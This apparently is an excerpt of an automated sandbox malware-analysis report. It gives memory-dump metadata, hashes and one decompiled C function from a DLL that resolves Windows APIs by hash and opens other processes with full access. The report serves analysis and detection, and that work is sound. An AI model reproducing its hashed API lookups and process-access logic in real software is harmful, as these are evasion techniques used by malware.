                                                                                                                                                  0x6e9a1817
                                                                                                                                                  0x6e9a1818
                                                                                                                                                  0x6e9a1819
                                                                                                                                                  0x6e9a181a
                                                                                                                                                  0x6e9a181d
                                                                                                                                                  0x6e9a1821
                                                                                                                                                  0x6e9a1825
                                                                                                                                                  0x6e9a182c
                                                                                                                                                  0x6e9a183e
                                                                                                                                                  0x6e9a1854
                                                                                                                                                  0x6e9a185f
                                                                                                                                                  0x6e9a1860
                                                                                                                                                  0x6e9a1861
                                                                                                                                                  0x6e9a1862
                                                                                                                                                  0x6e9a1863
                                                                                                                                                  0x6e9a1866
                                                                                                                                                  0x6e9a186a
                                                                                                                                                  0x6e9a186e
                                                                                                                                                  0x6e9a1875
                                                                                                                                                  0x6e9a1887
                                                                                                                                                  0x6e9a189d
                                                                                                                                                  0x6e9a18a8
                                                                                                                                                  0x6e9a18a9
                                                                                                                                                  0x6e9a18aa
                                                                                                                                                  0x6e9a18ab
                                                                                                                                                  0x6e9a18ac
                                                                                                                                                  0x6e9a18af
                                                                                                                                                  0x6e9a18b3
                                                                                                                                                  0x6e9a18b7
                                                                                                                                                  0x6e9a18be
                                                                                                                                                  0x6e9a18d0
                                                                                                                                                  0x6e9a18e6
                                                                                                                                                  0x6e9a18f1
                                                                                                                                                  0x6e9a18f2
                                                                                                                                                  0x6e9a18f3
                                                                                                                                                  0x6e9a18f4
                                                                                                                                                  0x6e9a18f5
                                                                                                                                                  0x6e9a18f8
                                                                                                                                                  0x6e9a18fc
                                                                                                                                                  0x6e9a1900
                                                                                                                                                  0x6e9a1907
                                                                                                                                                  0x6e9a1919
                                                                                                                                                  0x6e9a192f
                                                                                                                                                  0x6e9a193a
                                                                                                                                                  0x6e9a193b
                                                                                                                                                  0x6e9a193c
                                                                                                                                                  0x6e9a193d
                                                                                                                                                  0x6e9a193e
                                                                                                                                                  0x6e9a1941
                                                                                                                                                  0x6e9a1945
                                                                                                                                                  0x6e9a1949
                                                                                                                                                  0x6e9a1950
                                                                                                                                                  0x6e9a1962
                                                                                                                                                  0x6e9a1978
                                                                                                                                                  0x6e9a1983
                                                                                                                                                  0x6e9a1984
                                                                                                                                                  0x6e9a1985
                                                                                                                                                  0x6e9a1986
                                                                                                                                                  0x6e9a198c
                                                                                                                                                  0x6e9a198f
                                                                                                                                                  0x6e9a1991
                                                                                                                                                  0x6e9a199c
                                                                                                                                                  0x6e9a19a3
                                                                                                                                                  0x6e9a19ac
                                                                                                                                                  0x6e9a19b4
                                                                                                                                                  0x6e9a19bb
                                                                                                                                                  0x6e9a19c4
                                                                                                                                                  0x6e9a19cc
                                                                                                                                                  0x6e9a19d3
                                                                                                                                                  0x6e9a19dc
                                                                                                                                                  0x6e9a19e4
                                                                                                                                                  0x6e9a19eb
                                                                                                                                                  0x6e9a19f4
                                                                                                                                                  0x6e9a19fc
                                                                                                                                                  0x6e9a1a03
                                                                                                                                                  0x6e9a1a0c
                                                                                                                                                  0x6e9a1a14
                                                                                                                                                  0x6e9a1a1b
                                                                                                                                                  0x6e9a1a24
                                                                                                                                                  0x6e9a1a2c
                                                                                                                                                  0x6e9a1a36
                                                                                                                                                  0x6e9a1a3f
                                                                                                                                                  0x6e9a1a47
                                                                                                                                                  0x6e9a1a51
                                                                                                                                                  0x6e9a1a5a
                                                                                                                                                  0x6e9a1a62
                                                                                                                                                  0x6e9a1a6c
                                                                                                                                                  0x6e9a1a75
                                                                                                                                                  0x6e9a1a7d
                                                                                                                                                  0x6e9a1a87
                                                                                                                                                  0x6e9a1a90
                                                                                                                                                  0x6e9a1a98
                                                                                                                                                  0x6e9a1aa2
                                                                                                                                                  0x6e9a1aab
                                                                                                                                                  0x6e9a1ab3
                                                                                                                                                  0x6e9a1abd
                                                                                                                                                  0x6e9a1ac6
                                                                                                                                                  0x6e9a1ace
                                                                                                                                                  0x6e9a1ad8
                                                                                                                                                  0x6e9a1ae1
                                                                                                                                                  0x6e9a1ae9
                                                                                                                                                  0x6e9a1af3
                                                                                                                                                  0x6e9a1afc
                                                                                                                                                  0x6e9a1b04
                                                                                                                                                  0x6e9a1b0e
                                                                                                                                                  0x6e9a1b17
                                                                                                                                                  0x6e9a1b1f
                                                                                                                                                  0x6e9a1b26
                                                                                                                                                  0x6e9a1b2f
                                                                                                                                                  0x6e9a1b37
                                                                                                                                                  0x6e9a1b3e
                                                                                                                                                  0x6e9a1b43
                                                                                                                                                  0x6e9a1b51
                                                                                                                                                  0x6e9a1b55
                                                                                                                                                  0x6e9a1b64
                                                                                                                                                  0x6e9a1b6d
                                                                                                                                                  0x6e9a1b72
                                                                                                                                                  0x6e9a1b79
                                                                                                                                                  0x6e9a1b7d
                                                                                                                                                  0x6e9a1b81
                                                                                                                                                  0x6e9a1b88
                                                                                                                                                  0x6e9a1b9a
                                                                                                                                                  0x6e9a1bb0
                                                                                                                                                  0x6e9a1bbb
                                                                                                                                                  0x6e9a1bbc
                                                                                                                                                  0x6e9a1bbd

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8nsK
                                                                                                                                                  • API String ID: 0-3012451157
                                                                                                                                                  • Opcode ID: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                                                                  • Instruction ID: dc89d609a182f1c296e234adc6751ae1f7d7829cec6b6c2ca26cc32caf8bb332
                                                                                                                                                  • Opcode Fuzzy Hash: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                                                                  • Instruction Fuzzy Hash: C232A7724087069AC715DF64C8549EF77A4AFF120CF204F1DB6895A2A2FF71E986CB81
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E6E9AA4E8(signed int* __ecx, void* __eflags) {
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				void* _t182;
                                                                                                                                                  				signed int _t183;
                                                                                                                                                  				signed int* _t188;
                                                                                                                                                  				void* _t198;
                                                                                                                                                  				void* _t199;
                                                                                                                                                  				void* _t228;
                                                                                                                                                  				void* _t229;
                                                                                                                                                  				void* _t242;
                                                                                                                                                  				void* _t243;
                                                                                                                                                  				void* _t251;
                                                                                                                                                  				signed int* _t271;
                                                                                                                                                  				void* _t282;
                                                                                                                                                  				void* _t284;
                                                                                                                                                  				void* _t285;
                                                                                                                                                  				void* _t296;
                                                                                                                                                  				signed int* _t308;
                                                                                                                                                  				void* _t324;
                                                                                                                                                  				signed int _t398;
                                                                                                                                                  				signed int _t402;
                                                                                                                                                  				intOrPtr* _t403;
                                                                                                                                                  				intOrPtr* _t404;
                                                                                                                                                  				signed int _t406;
                                                                                                                                                  				signed int _t407;
                                                                                                                                                  				signed int _t409;
                                                                                                                                                  				signed int _t411;
                                                                                                                                                  				signed int _t412;
                                                                                                                                                  				void* _t413;
                                                                                                                                                  				signed int _t414;
                                                                                                                                                  				signed int _t415;
                                                                                                                                                  				signed int _t416;
                                                                                                                                                  				signed int _t419;
                                                                                                                                                  				void* _t420;
                                                                                                                                                  				signed int _t421;
                                                                                                                                                  				void* _t422;
                                                                                                                                                  				signed int _t424;
                                                                                                                                                  				signed int _t429;
                                                                                                                                                  				signed int _t433;
                                                                                                                                                  				signed int _t434;
                                                                                                                                                  				signed int _t437;
                                                                                                                                                  				intOrPtr* _t439;
                                                                                                                                                  
                                                                                                                                                  				_t308 = __ecx;
                                                                                                                                                  				 *(_t439 + 0x78) = 0;
                                                                                                                                                  				 *_t439 = __ecx + 8;
                                                                                                                                                  				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t392 =  *_t308;
                                                                                                                                                  					E6E9AB658(_t439 + 0x24, _t392, 0x7fffffff);
                                                                                                                                                  					if(E6E9AF4D0(_t439 + 0x24) == 0) {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t308[0xc] = 0;
                                                                                                                                                  						E6E9AF654(_t439 + 0x24);
                                                                                                                                                  					}
                                                                                                                                                  					L63:
                                                                                                                                                  					_t398 = 0xffffffffffffffff;
                                                                                                                                                  					_t407 = 0xffffffffffffffff;
                                                                                                                                                  					L65:
                                                                                                                                                  					if((_t407 | _t398) != 0) {
                                                                                                                                                  						L68:
                                                                                                                                                  						return _t407;
                                                                                                                                                  					}
                                                                                                                                                  					if( *(_t439 + 0x78) != 0x20) {
                                                                                                                                                  						E6E9B2234(0x5dc, _t392, _t407);
                                                                                                                                                  						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					_t398 = 0xffffffffffffffff;
                                                                                                                                                  					_t407 = 0xffffffffffffffff;
                                                                                                                                                  					goto L68;
                                                                                                                                                  					L3:
                                                                                                                                                  					__eflags = _t308[1];
                                                                                                                                                  					if(_t308[1] <= 0) {
                                                                                                                                                  						L21:
                                                                                                                                                  						__eflags =  *(_t439 + 0x20);
                                                                                                                                                  						if( *(_t439 + 0x20) <= 0) {
                                                                                                                                                  							L33:
                                                                                                                                                  							E6E9AF654(_t439 + 0x24);
                                                                                                                                                  							__eflags = _t308[0xc];
                                                                                                                                                  							if(_t308[0xc] == 0) {
                                                                                                                                                  								L46:
                                                                                                                                                  								 *((intOrPtr*)(_t439 + 8)) = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t439 + 0xc)) = 0;
                                                                                                                                                  								E6E9AF584(_t439 + 0x14, 0);
                                                                                                                                                  								 *((intOrPtr*)(_t439 + 0x38)) = 0;
                                                                                                                                                  								 *(_t439 + 0x34) =  *_t308;
                                                                                                                                                  								E6E9AF584(_t439 + 0x40, 0);
                                                                                                                                                  								_t182 = 0x40;
                                                                                                                                                  								__eflags = _t308[7] - 0x40;
                                                                                                                                                  								_t183 =  <  ? _t308[7] : _t182;
                                                                                                                                                  								 *(_t439 + 0x74) = _t183;
                                                                                                                                                  								__eflags = _t183;
                                                                                                                                                  								if(_t183 <= 0) {
                                                                                                                                                  									L57:
                                                                                                                                                  									asm("movq xmm0, [0x6e9bb808]");
                                                                                                                                                  									asm("movq [esp+0x84], xmm0");
                                                                                                                                                  									_t406 = E6E9B3064(0x60a28c5c, 0x14e85b34);
                                                                                                                                                  									__eflags = _t406;
                                                                                                                                                  									if(_t406 == 0) {
                                                                                                                                                  										_t424 = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										L61:
                                                                                                                                                  										__eflags = _t424 - 0x3f;
                                                                                                                                                  										if(_t424 <= 0x3f) {
                                                                                                                                                  											__eflags = _t424 << 2;
                                                                                                                                                  											_t308[0xc] =  *(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
                                                                                                                                                  											_t188 = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
                                                                                                                                                  											_t407 = _t308[0xc];
                                                                                                                                                  											asm("cdq");
                                                                                                                                                  											_t308[0xd] =  *_t188;
                                                                                                                                                  											_t398 = _t392;
                                                                                                                                                  											E6E9AB5C4(_t439 + 0x34);
                                                                                                                                                  											E6E9AB5C4(_t439 + 8);
                                                                                                                                                  											goto L65;
                                                                                                                                                  										}
                                                                                                                                                  										L62:
                                                                                                                                                  										E6E9AB5C4(_t439 + 0x34);
                                                                                                                                                  										E6E9AB5C4(_t439 + 8);
                                                                                                                                                  										goto L63;
                                                                                                                                                  									}
                                                                                                                                                  									_t392 = E6E9AF4BC(_t439 + 0x14, 0);
                                                                                                                                                  									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
                                                                                                                                                  									_t133 = _t198 - 0x80; // -128
                                                                                                                                                  									_t199 = _t133;
                                                                                                                                                  									__eflags = _t199 - 0x3f;
                                                                                                                                                  									_t424 =  <=  ? _t199 : _t198;
                                                                                                                                                  									__eflags = _t424 - 0x102;
                                                                                                                                                  									if(_t424 == 0x102) {
                                                                                                                                                  										goto L62;
                                                                                                                                                  									}
                                                                                                                                                  									goto L61;
                                                                                                                                                  								}
                                                                                                                                                  								_t437 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									E6E9ACA8C(_t439 + 0x4c);
                                                                                                                                                  									_t392 = 0;
                                                                                                                                                  									_t324 = _t439 + 0x4c;
                                                                                                                                                  									 *((char*)(_t324 + 4)) = 0;
                                                                                                                                                  									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
                                                                                                                                                  									__eflags = E6E9AC280(_t324);
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828(_t439 + 0x14, E6E9AF4CC(_t439 + 0x10) + 4);
                                                                                                                                                  									 *((intOrPtr*)(E6E9AF4BC(_t439 + 0x14, E6E9AF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
                                                                                                                                                  									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
                                                                                                                                                  									_t409 = E6E9B3064(0x60a28c5c, 0x3659ae1e);
                                                                                                                                                  									__eflags = _t409;
                                                                                                                                                  									if(_t409 == 0) {
                                                                                                                                                  										L51:
                                                                                                                                                  										_t392 =  *(_t439 + 0x68);
                                                                                                                                                  										__eflags = _t392;
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t392 - 0xffffffff;
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											E6E9AF828(_t439 + 0x40, E6E9AF4CC(_t439 + 0x3c) + 4);
                                                                                                                                                  											 *(E6E9AF4BC(_t439 + 0x40, E6E9AF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
                                                                                                                                                  											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
                                                                                                                                                  											E6E9ACD24(_t439 + 0x4c, __eflags);
                                                                                                                                                  											_t437 = _t437 + 1;
                                                                                                                                                  											__eflags = _t437 -  *(_t439 + 0x74);
                                                                                                                                                  											if(_t437 <  *(_t439 + 0x74)) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											_t411 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											do {
                                                                                                                                                  												E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
                                                                                                                                                  												E6E9AF4BC(_t439 + 0x40, _t411 * 4);
                                                                                                                                                  												_t439 = _t439 + 0xffffffd8;
                                                                                                                                                  												asm("cdq");
                                                                                                                                                  												asm("pxor xmm5, xmm5");
                                                                                                                                                  												asm("movd xmm1, dword [ebp]");
                                                                                                                                                  												asm("movd xmm4, dword [edi]");
                                                                                                                                                  												asm("movd xmm0, edx");
                                                                                                                                                  												asm("cdq");
                                                                                                                                                  												asm("punpckldq xmm1, xmm0");
                                                                                                                                                  												asm("movq xmm2, [ebx+0x38]");
                                                                                                                                                  												asm("movq [esp], xmm1");
                                                                                                                                                  												asm("movd xmm3, edx");
                                                                                                                                                  												asm("punpckldq xmm4, xmm3");
                                                                                                                                                  												asm("movq [esp+0x8], xmm2");
                                                                                                                                                  												asm("movq [esp+0x10], xmm4");
                                                                                                                                                  												asm("movq [esp+0x18], xmm5");
                                                                                                                                                  												asm("movq [esp+0x20], xmm5");
                                                                                                                                                  												E6E9AAC48(__eflags);
                                                                                                                                                  												_t411 = _t411 + 1;
                                                                                                                                                  												__eflags = _t411 -  *(_t439 + 0x74);
                                                                                                                                                  											} while (_t411 <  *(_t439 + 0x74));
                                                                                                                                                  											goto L57;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t392 = _t439 + 0x68;
                                                                                                                                                  									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									if(0 != 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									goto L51;
                                                                                                                                                  								}
                                                                                                                                                  								E6E9ACD24(_t439 + 0x4c, __eflags);
                                                                                                                                                  								goto L62;
                                                                                                                                                  							}
                                                                                                                                                  							_t402 = _t308[1];
                                                                                                                                                  							__eflags = _t402;
                                                                                                                                                  							if(_t402 <= 0) {
                                                                                                                                                  								goto L46;
                                                                                                                                                  							}
                                                                                                                                                  							_t412 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t429 = _t412 * 4;
                                                                                                                                                  								_t392 =  *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
                                                                                                                                                  								__eflags = _t392 - _t308[0xd];
                                                                                                                                                  								if(_t392 == _t308[0xd]) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t412 = _t412 + 1;
                                                                                                                                                  								__eflags = _t412 - _t402;
                                                                                                                                                  								if(_t412 < _t402) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L46;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t412 - 0xffffffff;
                                                                                                                                                  							if(_t412 != 0xffffffff) {
                                                                                                                                                  								_t228 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                  								__eflags = _t228 - _t429;
                                                                                                                                                  								if(_t228 > _t429) {
                                                                                                                                                  									_t392 = 4 + _t412 * 4;
                                                                                                                                                  									 *(_t439 + 0x6c) = _t392;
                                                                                                                                                  									_t251 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                  									__eflags = _t251 -  *(_t439 + 0x6c);
                                                                                                                                                  									if(_t251 >  *(_t439 + 0x6c)) {
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0x90)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0x8c)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
                                                                                                                                                  										E6E9B38F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
                                                                                                                                                  										_t439 = _t439 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                                                                  									_t74 =  &(_t308[7]);
                                                                                                                                                  									 *_t74 = _t308[7] - 1;
                                                                                                                                                  									__eflags =  *_t74;
                                                                                                                                                  								}
                                                                                                                                                  								_t229 = E6E9AF4CC( *_t439);
                                                                                                                                                  								__eflags = _t229 - _t429;
                                                                                                                                                  								if(_t229 > _t429) {
                                                                                                                                                  									_t413 = 4 + _t412 * 4;
                                                                                                                                                  									_t242 = E6E9AF4CC( *_t439);
                                                                                                                                                  									__eflags = _t242 - _t413;
                                                                                                                                                  									if(_t242 > _t413) {
                                                                                                                                                  										_t243 = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0x94)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
                                                                                                                                                  										E6E9B38F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E9AF4CC( *_t439) - _t413);
                                                                                                                                                  										_t439 = _t439 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc);
                                                                                                                                                  									_t79 =  &(_t308[1]);
                                                                                                                                                  									 *_t79 = _t308[1] - 1;
                                                                                                                                                  									__eflags =  *_t79;
                                                                                                                                                  								}
                                                                                                                                                  								E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                                                                  								 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
                                                                                                                                                  								_t308[7] = _t308[7] + 1;
                                                                                                                                                  								E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 4);
                                                                                                                                                  								 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
                                                                                                                                                  								_t308[1] = _t308[1] + 1;
                                                                                                                                                  							}
                                                                                                                                                  							goto L46;
                                                                                                                                                  						}
                                                                                                                                                  						_t433 = 0;
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							 *(_t439 + 0x70) = _t433 * 4;
                                                                                                                                                  							_t403 = E6E9AF4BC(_t439 + 0x28, _t433 * 4);
                                                                                                                                                  							_t392 = _t308[1];
                                                                                                                                                  							 *(_t439 + 0x80) = _t392;
                                                                                                                                                  							__eflags = _t392;
                                                                                                                                                  							if(_t392 <= 0) {
                                                                                                                                                  								L29:
                                                                                                                                                  								_t414 = E6E9B3064(0x8e844d1e, 0x5c3654e3);
                                                                                                                                                  								__eflags = _t414;
                                                                                                                                                  								if(_t414 != 0) {
                                                                                                                                                  									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E9AF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
                                                                                                                                                  									__eflags = _t416;
                                                                                                                                                  									if(_t416 != 0) {
                                                                                                                                                  										E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                                                                  										 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
                                                                                                                                                  										_t308[7] = _t308[7] + 1;
                                                                                                                                                  										_t271 = E6E9AF4BC(_t439 + 0x28,  *(_t439 + 0x70));
                                                                                                                                                  										E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 4);
                                                                                                                                                  										 *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc)) =  *_t271;
                                                                                                                                                  										_t57 =  &(_t308[1]);
                                                                                                                                                  										 *_t57 = _t308[1] + 1;
                                                                                                                                                  										__eflags =  *_t57;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								goto L32;
                                                                                                                                                  							}
                                                                                                                                                  							_t415 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t392 =  *(E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
                                                                                                                                                  								__eflags = _t392 -  *_t403;
                                                                                                                                                  								if(_t392 ==  *_t403) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t415 = _t415 + 1;
                                                                                                                                                  								__eflags = _t415 -  *(_t439 + 0x80);
                                                                                                                                                  								if(_t415 <  *(_t439 + 0x80)) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L29;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t415 - 0xffffffff;
                                                                                                                                                  							if(_t415 == 0xffffffff) {
                                                                                                                                                  								goto L29;
                                                                                                                                                  							}
                                                                                                                                                  							L32:
                                                                                                                                                  							_t433 = _t433 + 1;
                                                                                                                                                  							__eflags = _t433 -  *(_t439 + 0x20);
                                                                                                                                                  						} while (_t433 <  *(_t439 + 0x20));
                                                                                                                                                  						goto L33;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t434 = 0;
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							 *(_t439 + 0x64) = _t434 * 4;
                                                                                                                                                  							_t404 = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
                                                                                                                                                  							_t392 =  *(_t439 + 0x20);
                                                                                                                                                  							 *(_t439 + 0x7c) = _t392;
                                                                                                                                                  							__eflags = _t392;
                                                                                                                                                  							if(_t392 <= 0) {
                                                                                                                                                  								L11:
                                                                                                                                                  								_t282 = E6E9AF4CC( *_t439);
                                                                                                                                                  								__eflags = _t282 -  *(_t439 + 0x64);
                                                                                                                                                  								if(_t282 >  *(_t439 + 0x64)) {
                                                                                                                                                  									_t420 = 4 + _t434 * 4;
                                                                                                                                                  									_t296 = E6E9AF4CC( *_t439);
                                                                                                                                                  									__eflags = _t296 - _t420;
                                                                                                                                                  									if(_t296 > _t420) {
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0x9c)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0x98)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
                                                                                                                                                  										E6E9B38F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E9AF4CC( *_t439) - _t420);
                                                                                                                                                  										_t439 = _t439 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( *((intOrPtr*)(_t439 + 4)), E6E9AF4CC( *_t439) + 0xfffffffc);
                                                                                                                                                  									_t22 =  &(_t308[1]);
                                                                                                                                                  									 *_t22 = _t308[1] - 1;
                                                                                                                                                  									__eflags =  *_t22;
                                                                                                                                                  								}
                                                                                                                                                  								_t419 = E6E9B3064(0x60a28c5c, 0xe96b154c);
                                                                                                                                                  								__eflags = _t419;
                                                                                                                                                  								if(_t419 != 0) {
                                                                                                                                                  									 *_t419( *((intOrPtr*)(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
                                                                                                                                                  								}
                                                                                                                                                  								_t284 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                  								__eflags = _t284 -  *(_t439 + 0x64);
                                                                                                                                                  								if(_t284 >  *(_t439 + 0x64)) {
                                                                                                                                                  									_t422 = 4 + _t434 * 4;
                                                                                                                                                  									_t285 = E6E9AF4CC( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                  									__eflags = _t285 - _t422;
                                                                                                                                                  									if(_t285 > _t422) {
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0xa4)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
                                                                                                                                                  										 *((intOrPtr*)(_t439 + 0xa0)) = E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
                                                                                                                                                  										E6E9B38F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
                                                                                                                                                  										_t439 = _t439 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( *((intOrPtr*)(_t439 + 8)), E6E9AF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                                                                  									_t33 =  &(_t308[7]);
                                                                                                                                                  									 *_t33 = _t308[7] - 1;
                                                                                                                                                  									__eflags =  *_t33;
                                                                                                                                                  								}
                                                                                                                                                  								_t434 = _t434 - 1;
                                                                                                                                                  								__eflags = _t434;
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  							_t421 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t392 =  *(E6E9AF4BC(_t439 + 0x28, _t421 * 4));
                                                                                                                                                  								__eflags = _t392 -  *_t404;
                                                                                                                                                  								if(_t392 ==  *_t404) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t421 = _t421 + 1;
                                                                                                                                                  								__eflags = _t421 -  *(_t439 + 0x7c);
                                                                                                                                                  								if(_t421 <  *(_t439 + 0x7c)) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L11;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t421 - 0xffffffff;
                                                                                                                                                  							if(_t421 == 0xffffffff) {
                                                                                                                                                  								goto L11;
                                                                                                                                                  							}
                                                                                                                                                  							L20:
                                                                                                                                                  							_t434 = _t434 + 1;
                                                                                                                                                  							__eflags = _t434 - _t308[1];
                                                                                                                                                  						} while (_t434 < _t308[1]);
                                                                                                                                                  						goto L21;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}













































                                                                                                                                                  0x6e9aa8d6
                                                                                                                                                  0x6e9aa8d8
                                                                                                                                                  0x6e9aa8dc
                                                                                                                                                  0x6e9aa8e1
                                                                                                                                                  0x6e9aa8e3
                                                                                                                                                  0x6e9aa8e7
                                                                                                                                                  0x6e9aa8ea
